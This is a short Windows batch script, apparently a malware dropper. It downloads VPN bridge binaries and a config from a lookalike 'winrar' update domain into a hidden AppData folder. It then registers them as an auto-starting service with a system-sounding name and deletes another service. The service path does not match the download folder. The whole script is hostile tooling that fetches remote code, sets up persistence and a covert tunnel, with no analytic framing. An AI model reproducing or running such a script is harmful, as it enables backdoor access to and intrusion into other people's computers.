@echo off
curl -o %APPDATA%\Microsoft\Windows\hamcore.se2 https://winrarprocupdate.online/files/hamcore.se2
curl -o %APPDATA%\Microsoft\Windows\vpnbridge_x64.exe https://winrarprocupdate.online/files/vpnbridge_x64.exe
curl -o %APPDATA%\Microsoft\Windows\vpn_bridge.config https://winrarprocupdate.online/files/vpn_bridge.config
sc create WinSrvUpdateApp binpath= "%APPDATA%\Microsoft\vpnbridge_x64.exe /service" start=auto

sc start WinSrvUpdateApp

sc stop WinSrvUpdateDef
sc delete WinSrvUpdateDef
